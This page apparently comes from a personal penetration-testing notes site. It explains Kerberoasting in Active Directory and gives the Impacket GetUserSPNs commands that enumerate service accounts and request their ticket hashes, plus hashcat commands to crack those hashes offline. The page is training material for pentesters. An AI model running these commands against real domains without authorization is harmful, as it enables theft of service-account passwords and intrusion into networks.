🙈
Pentesting
  • Tenaka.net
  • Links
    • Tenaka
    • GTFOBins
    • WinPeas
    • LinPeas
    • Hacktricks
    • OFFENSIVE SECURITY CHEATSHEET
  • Recon
    • NMAP
      • Basics
  • Enumeration
    • NMAP
      • LDAP
      • DNS
      • SMB
      • SQL
      • Web
    • Windows
      • Escalation Checks
      • Users
        • Users PS
        • Users ADSI
        • Users CMD
      • Host Config
      • Updates (All)
        • Exploit Suggester
      • Domain
        • Domain PS
        • Domain CMD
      • Computers
        • Computer PS
      • Components
        • Logical Disks
      • Networking
        • Networking CMD
        • Firewall CMD
      • Services
      • Passwords
        • Findstring
        • Registry
      • Groups
        • Groups PS
      • Misconfigurations
        • UnQuoted Paths (All)
      • Files and Folders
        • Data Streams
      • invoke-command
      • Registry
    • Linux
      • Paths
      • CVE's
      • Hosts File
      • Linux PrivEsc
      • File Permissions
      • Append to a file
      • SSH
    • Kali
      • Passwords\Usernames
    • Certificates
      • User Certificate to WinRM
    • FTP
    • Web
      • wfuzz
      • ffuf
      • gobuster
      • dirb
      • Dirbuster
      • Nikto
      • Wordpress
        • WPScan (wordpress)
        • Could be WPScan
        • WP Interesting paths
    • DNS
      • Hosts File
      • nslookup
      • Dig
      • dnsrecon
      • DNSAdmin Escalation
    • LDAP \ AD \ DC
      • ldapsearch
      • crackmapexec
      • enum4linux-ng
      • RPC
      • Kerbrute
      • Impacket
        • Pre-Authentication
        • SecretsDump - dump hashes
        • Kerberoasting
        • GoldenPAC
      • evil-winrm
      • smbclient
      • Bloodhound - AD Recon
      • DCSync
        • GetChangesAll
    • Group Policy
      • Gpp Password
    • SMB
      • crackmapexec
      • smbclient
      • enum4linux
      • MSFConsole
      • smbmap
        • Error Help
    • Databases
      • MS SQL
      • Read .mdb file
      • Read PST File
    • Exploit-DB
    • WinRM
      • evil-winrm using certs for connection
      • evil-winrm User creds
    • Files
      • Meta Data
      • .apk
    • Misc
      • Flask
      • RocketChat
    • Python
  • Exploitation
    • FTP
      • FTP Anonymous
    • Meterpreter
      • Potato and SeImpersonate
      • Exploit Suggest
        • Commands
    • MSVenom
      • Win Web ASPX
      • Python
      • Powershell
      • Windows
    • Reverse Shells
      • Groovy Script Console
      • Web Reverse Shell using Powershell
      • Upload and exe from web or ftp site
      • nc
      • Bash Reverse Shell
      • MSFConsole Reverse Shell
    • Metasploit
      • Double Pulsar
    • Burpsuite
      • Spraying
  • Boxes
    • Jeeves Potato Attack
    • AChat
  • Useful Commands
    • PowerSploit \ Empire
      • Importing Powersploit Module
    • Transfer Data
      • Downloading
        • Simple Web
        • SMB
        • Certutil
        • Powershell
        • wget
        • Curl
      • Uploading
        • SMB
    • Password Cracking
      • Hashcat
        • MD5
        • NTLM
        • Kerberos
      • Zip Files
      • PFX
      • Create password from scavenging website.
      • NTDS.dit
      • Hydra
        • ssh
      • Hashes
        • hash-identifier
      • Base64 Mapping
      • Hexdump xxp
      • VNC Decrypt Password
Powered by GitBook
On this page
  1. Enumeration
  2. LDAP \ AD \ DC
  3. Impacket

Kerberoasting

GetUserSPNs.py

#Every user can request TGS from any DC for any service with a registered SPN belonging to a service account (not a hostbased SPN). The DC does not validate the users request and whether the user is authorised. The TGS is passed to the user with the NT Hash of the service account. If the service accounts password is weak it can be cracked offline.

cd Impacket/examples

#Search for SPN's with no credentials

Get-UserSPNs -dc-ip 10.0.0.1 domain.loc/username -no-pass

#Search for SPN's with credentials

Get-UserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1

#Search for SPN's with credentials and request hash

Get-UserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1 -request -outputfile kerb.txt

#Cracking the hash (Kerberos 5 TGS-REP etype 23)

hashcat -m 13100 -a 0 -outputfile kerb.txt rockyou.txt --force

#show cracked password

hashcat -m 13100 --show kerb.txt

note:

Get-UserSPNs.py when installed from github can error with the following:

'NoneType' object has no attribute 'getCredential'

Install the repo Kali version with the following command:

sudo apt install python3-impacket

The command changes and doesnt require CD'ing into the example directory

impacket-GetUserSPNs fqdn.com/svc_user:Password1234 -dc-ip 10.0.0.1 -request

PreviousSecretsDump - dump hashesNextGoldenPAC

Last updated 2 years ago